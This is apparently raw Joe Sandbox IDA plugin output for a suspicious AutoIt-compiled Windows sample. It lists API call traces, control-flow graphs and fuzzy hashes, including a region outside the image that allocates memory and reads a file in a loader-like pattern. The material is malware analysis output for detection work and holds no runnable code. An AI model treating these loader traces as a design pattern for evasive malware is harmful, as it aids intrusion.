                                                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F79511
                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F79522
                                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F79534
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                              • String ID:
                                                              • API String ID: 1500180987-0
                                                              • Opcode ID: c4b6014cb8e947f2f1d268b6498bc60f68b8fc7e31040684db79b678246ed986
                                                              • Instruction ID: 573ed980ca0cd404df030f32bda91bfed2b0907d795d01bee2cf64462a9e4bcf
                                                              • Opcode Fuzzy Hash: c4b6014cb8e947f2f1d268b6498bc60f68b8fc7e31040684db79b678246ed986
                                                              • Instruction Fuzzy Hash: E0C14CB1D04219AADF21DF94CC85EDEB7BDEF85310F0080AAF609E7141DB749A85AF61

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F13074
                                                              • RegisterClassExW.USER32(00000030), ref: 00F1309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F130AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00F130CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F130DC
                                                              • LoadIconW.USER32(000000A9), ref: 00F130F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F13101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: 6863e4792139eb62a275a0a29775b3387f9983e9b8df7d0f0d01ac72e6051f29
                                                              • Instruction ID: 5ee7c09ecae0caf5dad2cf36374cd7b396895f54457a905b9829402c40161f6b
                                                              • Opcode Fuzzy Hash: 6863e4792139eb62a275a0a29775b3387f9983e9b8df7d0f0d01ac72e6051f29
                                                              • Instruction Fuzzy Hash: 483123B1841349AFDB11CFA4E889ACDBBF5FB09710F24452FE580E62A1D3B90589EF51

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F13074
                                                              • RegisterClassExW.USER32(00000030), ref: 00F1309E
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F130AF
                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00F130CC
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F130DC
                                                              • LoadIconW.USER32(000000A9), ref: 00F130F2
                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F13101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                              • API String ID: 2914291525-1005189915
                                                              • Opcode ID: fe4fd9e812023bb0930a331593d370ff8f419d45bd7ff87e26d2dc41fa2e66ec
                                                              • Instruction ID: 74dcaf8c10fdadba26041e5065dbacb4c05061d086fb2218056d197049cd9ea7
                                                              • Opcode Fuzzy Hash: fe4fd9e812023bb0930a331593d370ff8f419d45bd7ff87e26d2dc41fa2e66ec
                                                              • Instruction Fuzzy Hash: 7B21B2B191161CAFDB00DFA4EC89ADDBBF9FB08B01F10412BF911E62A0D7B14558AF91

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00F14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FD52F8,?,00F137AE,?), ref: 00F14724
                                                                • Part of subcall function 00F3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F17165), ref: 00F3052D
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F171A8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F4E8C8
                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F4E909
                                                              • RegCloseKey.ADVAPI32(?), ref: 00F4E947
                                                              • _wcscat.LIBCMT ref: 00F4E9A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                              • API String ID: 2673923337-2727554177
                                                              • Opcode ID: 2e97b389e6036c7966b07296c4fc5b58a73fbd496e3d8521e7314aaa505ac0fb
                                                              • Instruction ID: 6e001fe2f8c858da7da2e1a5bc0eedc68ae333b5fe21b149a4cf891ad8876fbd
                                                              • Opcode Fuzzy Hash: 2e97b389e6036c7966b07296c4fc5b58a73fbd496e3d8521e7314aaa505ac0fb
                                                              • Instruction Fuzzy Hash: 7B714A715093059ECB04EF25EC819ABBBB9FF88310F40092FF445D72A1EB759988EB52

                                                              Control-flow Graph

                                                              APIs
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00F13A50
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00F13A5F
                                                              • LoadIconW.USER32(00000063), ref: 00F13A76
                                                              • LoadIconW.USER32(000000A4), ref: 00F13A88
                                                              • LoadIconW.USER32(000000A2), ref: 00F13A9A
                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F13AC0
                                                              • RegisterClassExW.USER32(?), ref: 00F13B16
                                                                • Part of subcall function 00F13041: GetSysColorBrush.USER32(0000000F), ref: 00F13074
                                                                • Part of subcall function 00F13041: RegisterClassExW.USER32(00000030), ref: 00F1309E
                                                                • Part of subcall function 00F13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F130AF
                                                                • Part of subcall function 00F13041: InitCommonControlsEx.COMCTL32(?), ref: 00F130CC
                                                                • Part of subcall function 00F13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F130DC
                                                                • Part of subcall function 00F13041: LoadIconW.USER32(000000A9), ref: 00F130F2
                                                                • Part of subcall function 00F13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F13101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                              • String ID: #$0$AutoIt v3
                                                              • API String ID: 423443420-4155596026
                                                              • Opcode ID: e3737bafb18bfbd93fa22d5d73eb8fccf67f785f7e60cba2ed6ba1ddb20955b5
                                                              • Instruction ID: 8cbbb36644e48abe5cf9b18bd9fceb47258f91b232283dde7afcf7fc07d27192
                                                              • Opcode Fuzzy Hash: e3737bafb18bfbd93fa22d5d73eb8fccf67f785f7e60cba2ed6ba1ddb20955b5
                                                              • Instruction Fuzzy Hash: B5212DB1D0130CAFEB10DFB4EC49B9D7BB6FB08B16F10011BE504A62A1D3B55658AF95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 767 f13633-f13681 769 f136e1-f136e3 767->769 770 f13683-f13686 767->770 769->770 773 f136e5 769->773 771 f136e7 770->771 772 f13688-f1368f 770->772 777 f4d0cc-f4d0fa call f21070 call f21093 771->777 778 f136ed-f136f0 771->778 774 f13695-f1369a 772->774 775 f1374b-f13753 PostQuitMessage 772->775 776 f136ca-f136d2 DefWindowProcW 773->776 780 f4d154-f4d168 call f72527 774->780 781 f136a0-f136a2 774->781 782 f13711-f13713 775->782 783 f136d8-f136de 776->783 812 f4d0ff-f4d106 777->812 784 f136f2-f136f3 778->784 785 f13715-f1373c SetTimer RegisterWindowMessageW 778->785 780->782 806 f4d16e 780->806 787 f13755-f13764 call f144a0 781->787 788 f136a8-f136ad 781->788 782->783 791 f136f9-f1370c KillTimer call f1443a call f13114 784->791 792 f4d06f-f4d072 784->792 785->782 789 f1373e-f13749 CreatePopupMenu 785->789 787->782 794 f136b3-f136b8 788->794 795 f4d139-f4d140 788->795 789->782 791->782 798 f4d074-f4d076 792->798 799 f4d0a8-f4d0c7 MoveWindow 792->799 804 f4d124-f4d134 call f72d36 794->804 805 f136be-f136c4 794->805 795->776 802 f4d146-f4d14f call f67c36 795->802 808 f4d097-f4d0a3 SetFocus 798->808 809 f4d078-f4d07b 798->809 799->782 802->776 804->782 805->776 805->812 806->776 808->782 809->805 813 f4d081-f4d092 call f21070 809->813 812->776 816 f4d10c-f4d11f call f1443a call f1434a 812->816 813->782 816->776
                                                              APIs
                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00F136D2
                                                              • KillTimer.USER32(?,00000001), ref: 00F136FC
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F1371F
                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F1372A
                                                              • CreatePopupMenu.USER32 ref: 00F1373E
                                                              • PostQuitMessage.USER32(00000000), ref: 00F1374D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                              • String ID: TaskbarCreated
                                                              • API String ID: 129472671-2362178303
                                                              • Opcode ID: 8a1c4b6b26bb5ddf85d83d610d68e370f3c79651cf85c47a9962d26c1b7a679c
                                                              • Instruction ID: b9ffffd5a572f22924222307aa990ab0bab155c40158f65aba85d1568b6d9b7e
                                                              • Opcode Fuzzy Hash: 8a1c4b6b26bb5ddf85d83d610d68e370f3c79651cf85c47a9962d26c1b7a679c
                                                              • Instruction Fuzzy Hash: AE415DB2604509BBEB249F74EC09FFD3B56EB00712F140127F902D62E2DA649D84B762

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                              • API String ID: 1825951767-3513169116
                                                              • Opcode ID: ad44389797adf2fca30980c5c72027c9c4fd0bf03b39b0303e8deaa1caeef4bf
                                                              • Instruction ID: dc37d21d36a6a6bfe49f55c3b023bd55b88a4637afd874a1a40e4fdeb6f7f5fe
                                                              • Opcode Fuzzy Hash: ad44389797adf2fca30980c5c72027c9c4fd0bf03b39b0303e8deaa1caeef4bf
                                                              • Instruction Fuzzy Hash: 9DA18072D0021D9ADF04EBA0DC91EEEBB79BF54710F44042AF415B7191DF789A89EBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 942 17a8920-17a89ce call 17a6340 945 17a89d5-17a89fb call 17a9830 CreateFileW 942->945 948 17a89fd 945->948 949 17a8a02-17a8a12 945->949 950 17a8b4d-17a8b51 948->950 954 17a8a19-17a8a33 VirtualAlloc 949->954 955 17a8a14 949->955 952 17a8b93-17a8b96 950->952 953 17a8b53-17a8b57 950->953 956 17a8b99-17a8ba0 952->956 957 17a8b59-17a8b5c 953->957 958 17a8b63-17a8b67 953->958 959 17a8a3a-17a8a51 ReadFile 954->959 960 17a8a35 954->960 955->950 961 17a8ba2-17a8bad 956->961 962 17a8bf5-17a8c0a 956->962 957->958 963 17a8b69-17a8b73 958->963 964 17a8b77-17a8b7b 958->964 969 17a8a58-17a8a98 VirtualAlloc 959->969 970 17a8a53 959->970 960->950 971 17a8baf 961->971 972 17a8bb1-17a8bbd 961->972 965 17a8c1a-17a8c22 962->965 966 17a8c0c-17a8c17 VirtualFree 962->966 963->964 967 17a8b8b 964->967 968 17a8b7d-17a8b87 964->968 966->965 967->952 968->967 973 17a8a9a 969->973 974 17a8a9f-17a8aba call 17a9a80 969->974 970->950 971->962 975 17a8bbf-17a8bcf 972->975 976 17a8bd1-17a8bdd 972->976 973->950 982 17a8ac5-17a8acf 974->982 978 17a8bf3 975->978 979 17a8bea-17a8bf0 976->979 980 17a8bdf-17a8be8 976->980 978->956 979->978 980->978 983 17a8b02-17a8b16 call 17a9890 982->983 984 17a8ad1-17a8b00 call 17a9a80 982->984 990 17a8b1a-17a8b1e 983->990 991 17a8b18 983->991 984->982 992 17a8b2a-17a8b2e 990->992 993 17a8b20-17a8b24 CloseHandle 990->993 991->950 994 17a8b3e-17a8b47 992->994 995 17a8b30-17a8b3b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017A89F1
                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017A8C17
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateFileFreeVirtual
                                                              • String ID:
                                                              • API String ID: 204039940-0
                                                              • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction ID: f3fead4fe50170a62e063f94f076adb2ea222db6cafb049d8c1297a689c23a71
                                                              • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                              • Instruction Fuzzy Hash: 63A10870E00209EBDB14CFA4C899BEEFBB5BF88305F548299E211BB280D7759A40CB55

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1073 f139d5-f13a45 CreateWindowExW * 2 ShowWindow * 2
                                                              APIs
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F13A03
                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F13A24
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00F13A38
                                                              • ShowWindow.USER32(00000000,?,?), ref: 00F13A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$CreateShow
                                                              • String ID: AutoIt v3$edit
                                                              • API String ID: 1584632944-3779509399
                                                              • Opcode ID: aa602e3ffc224b2f8ed9b2700662c0a7ea454d267ebdbf0b3161973cbbc5f495
                                                              • Instruction ID: 87bd1b80d73fc1c4e97ad9d6fa9437556011dd29ef164f8044938c504b959e3c
                                                              • Opcode Fuzzy Hash: aa602e3ffc224b2f8ed9b2700662c0a7ea454d267ebdbf0b3161973cbbc5f495
                                                              • Instruction Fuzzy Hash: AEF03A70A022987EEB3157636C48E6B3F7ED7C7F52B00002BB900E2170C2610808EAB0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1074 17a86f0-17a8821 call 17a6340 call 17a85e0 CreateFileW 1081 17a8828-17a8838 1074->1081 1082 17a8823 1074->1082 1085 17a883a 1081->1085 1086 17a883f-17a8859 VirtualAlloc 1081->1086 1083 17a88d8-17a88dd 1082->1083 1085->1083 1087 17a885b 1086->1087 1088 17a885d-17a8874 ReadFile 1086->1088 1087->1083 1089 17a8878-17a88b2 call 17a8620 call 17a75e0 1088->1089 1090 17a8876 1088->1090 1095 17a88ce-17a88d6 ExitProcess 1089->1095 1096 17a88b4-17a88c9 call 17a8670 1089->1096 1090->1083 1095->1083 1096->1095
                                                              APIs
                                                                • Part of subcall function 017A85E0: Sleep.KERNELBASE(000001F4), ref: 017A85F1
                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017A8817
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2129210722.00000000017A6000.00000040.00000020.00020000.00000000.sdmp, Offset: 017A6000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_17a6000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateFileSleep
                                                              • String ID: JQE9J4UYUCN8B3Z9CYCLMW
                                                              • API String ID: 2694422964-3901345617
                                                              • Opcode ID: 5ce9dd456f51453141574044b060f7ca254bcf01dd1e52e78e528275ac156387
                                                              • Instruction ID: 0b7bf95b318963cb1e8bb321acc1123b76f1b144028c6416df491111b61ec576
                                                              • Opcode Fuzzy Hash: 5ce9dd456f51453141574044b060f7ca254bcf01dd1e52e78e528275ac156387
                                                              • Instruction Fuzzy Hash: 3551A370D04249DAEF11DBE4D818BEEFBB9AF55305F004199E608BB2C1D7B94B44CBA6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1098 f1407c-f14092 1099 f14098-f140ad call f17a16 1098->1099 1100 f1416f-f14173 1098->1100 1103 f140b3-f140d3 call f17bcc 1099->1103 1104 f4d3c8-f4d3d7 LoadStringW 1099->1104 1107 f4d3e2-f4d3fa call f17b2e call f16fe3 1103->1107 1109 f140d9-f140dd 1103->1109 1104->1107 1116 f140ed-f1416a call f32de0 call f1454e call f32dbc Shell_NotifyIconW call f15904 1107->1116 1120 f4d400-f4d41e call f17cab call f16fe3 call f17cab 1107->1120 1111 f140e3-f140e8 call f17b2e 1109->1111 1112 f14174-f1417d call f18047 1109->1112 1111->1116 1112->1116 1116->1100 1120->1116
                                                              APIs
                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F4D3D7
                                                                • Part of subcall function 00F17BCC: _memmove.LIBCMT ref: 00F17C06
                                                              • _memset.LIBCMT ref: 00F140FC
                                                              • _wcscpy.LIBCMT ref: 00F14150
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F14160
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                              • String ID: Line:
                                                              • API String ID: 3942752672-1585850449
                                                              • Opcode ID: 74e6c3143d3d6000b25cfd7bc7abed87cc354b441e50e07670d3e70871b2ae00
                                                              • Instruction ID: 65461ac64165c832b97acef08a3d1cb0580bfe62039d802418cd1ac2a97b70bb
                                                              • Opcode Fuzzy Hash: 74e6c3143d3d6000b25cfd7bc7abed87cc354b441e50e07670d3e70871b2ae00
                                                              • Instruction Fuzzy Hash: 8631B271408304AAD321EB60DC45FDB77E8AF84711F14451FF58992091EB74A689F793

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1133 f1686a-f16891 call f14ddd 1136 f4e031-f4e041 call f7955b 1133->1136 1137 f16897-f168a5 call f14ddd 1133->1137 1141 f4e046-f4e048 1136->1141 1137->1136 1142 f168ab-f168b1 1137->1142 1143 f4e067-f4e0af call f30db6 1141->1143 1144 f4e04a-f4e04d call f14e4a 1141->1144 1147 f4e052-f4e061 call f742f8 1142->1147 1148 f168b7-f168d9 call f16a8c 1142->1148 1153 f4e0d4 1143->1153 1154 f4e0b1-f4e0bb 1143->1154 1144->1147 1147->1143 1157 f4e0d6-f4e0e9 1153->1157 1156 f4e0cf-f4e0d0 1154->1156 1158 f4e0d2 1156->1158 1159 f4e0bd-f4e0cc 1156->1159 1160 f4e260-f4e263 call f32d55 1157->1160 1161 f4e0ef 1157->1161 1158->1157 1159->1156 1165 f4e268-f4e271 call f14e4a 1160->1165 1163 f4e0f6-f4e0f9 call f17480 1161->1163 1166 f4e0fe-f4e120 call f15db2 call f773e9 1163->1166 1171 f4e273-f4e283 call f17616 call f15d9b 1165->1171 1177 f4e134-f4e13e call f773d3 1166->1177 1178 f4e122-f4e12f 1166->1178 1184 f4e288-f4e2b8 call f6f7a1 call f30e2c call f32d55 call f14e4a 1171->1184 1186 f4e140-f4e153 1177->1186 1187 f4e158-f4e162 call f773bd 1177->1187 1180 f4e227-f4e237 call f1750f 1178->1180 1180->1166 1189 f4e23d-f4e247 call f1735d 1180->1189 1184->1171 1186->1180 1196 f4e164-f4e171 1187->1196 1197 f4e176-f4e180 call f15e2a 1187->1197 1195 f4e24c-f4e25a 1189->1195 1195->1160 1195->1163 1196->1180 1197->1180 1202 f4e186-f4e19e call f6f73d 1197->1202 1208 f4e1a0-f4e1bf call f17de1 call f15904 1202->1208 1209 f4e1c1-f4e1c4 1202->1209 1233 f4e1e2-f4e1f0 call f15db2 1208->1233 1211 f4e1c6-f4e1e1 call f17de1 call f16839 call f15904 1209->1211 1212 f4e1f2-f4e1f5 1209->1212 1211->1233 1214 f4e215-f4e218 call f7737f 1212->1214 1215 f4e1f7-f4e200 call f6f65e 1212->1215 1220 f4e21d-f4e226 call f30e2c 1214->1220 1215->1184 1227 f4e206-f4e210 call f30e2c 1215->1227 1220->1180 1227->1166 1233->1220
                                                              APIs
                                                                • Part of subcall function 00F14DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F14E0F
                                                              • _free.LIBCMT ref: 00F4E263
                                                              • _free.LIBCMT ref: 00F4E2AA
                                                                • Part of subcall function 00F16A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F16BAD
                                                              Strings
                                                              Memory Dump Source
